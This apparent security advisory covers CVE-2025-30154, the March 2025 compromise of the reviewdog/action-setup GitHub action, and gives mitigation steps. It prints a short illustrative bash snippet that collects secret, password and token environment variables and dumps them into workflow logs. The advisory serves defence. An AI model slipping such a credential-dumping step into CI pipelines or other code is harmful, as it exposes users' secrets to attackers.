CVE-2025-30154 is a vulnerability that emerged on March 11, 2025, and affected the reviewdog/action-setup GitHub action. The vulnerability involves the leaking of secrets via malicious code injection into the GitHub Actions Workflow Logs during the specified window of time. This post explores the details of this vulnerability, the affected GitHub actions, and suggested steps to mitigate the risks associated with the compromised versions of reviewdog/action-setup@v1.
Compromised reviewdog/action-setup@v1
The compromisation was discovered to have occurred between 18:42 and 20:31 UTC on March 11, 2025. During this time frame, malicious actors managed to inject a code snippet that dumped exposed secrets to GitHub Actions Workflow Logs. As a result, potentially sensitive information is accessible through these logs, potentially endangering projects utilizing the compromised reviewdog actions.
Here's a sample code snippet illustrating the malicious code injection
#!/bin/bash
# Injected malicious code
exposed_secrets=$(env | grep -Ei "secret|password|token")
echo "Exposing secrets: $exposed_secrets"
# End of injected malicious code
# Original code continues here
...
Affected reviewdog actions
While reviewdog/action-setup@v1 was the direct target, other GitHub actions utilizing this compromised version became indirectly vulnerable. The affected actions include:
1. reviewdog/action-shellcheck
2. reviewdog/action-composite-template
3. reviewdog/action-staticcheck
4. reviewdog/action-ast-grep
5. reviewdog/action-typos
These actions have varying versions and pinning methods, regardless of which the exploitation of CVE-2025-30154 would compromise them due to their dependency on the reviewdog/action-setup@v1 GitHub action.
Exploit details
The exploit occurs during the execution of the compromised reviewdog/action-setup@v1. During the specified timeframe of 18:42 and 20:31 UTC on March 11, 2025, the injected malicious code dumps exposed secrets, including tokens, passwords, and other sensitive information, to the GitHub Actions Workflow Logs. As a result, the impacted projects may experience data leakage or unauthorized access.
Mitigation recommendations
We recommend the following actions to mitigate the risks associated with the CVE-2025-30154 vulnerability:
1. Check the logs: Review your GitHub Actions Workflow Logs during the specified timeframe to identify any exposed secrets.
2. Change secrets: If any exposed secrets are identified, immediately change or revoke the corresponding secrets and tokens.
3. Update dependencies: Update the affected reviewdog actions to the latest released version or a version that does not fall within the compromise window.
4. Monitor activity: Keep an eye on project activity, repository access, and other signs of unauthorized actions.
Conclusion
The CVE-2025-30154 vulnerability shows the importance of being vigilant about dependencies, updates, and monitoring of project activity. Organizations utilizing the affected GitHub actions should take proper measures to mitigate the risks related to this exploit.
Timeline
Published on: 03/19/2025 16:15:33 UTC
Last modified on: 03/25/2025 01:00:02 UTC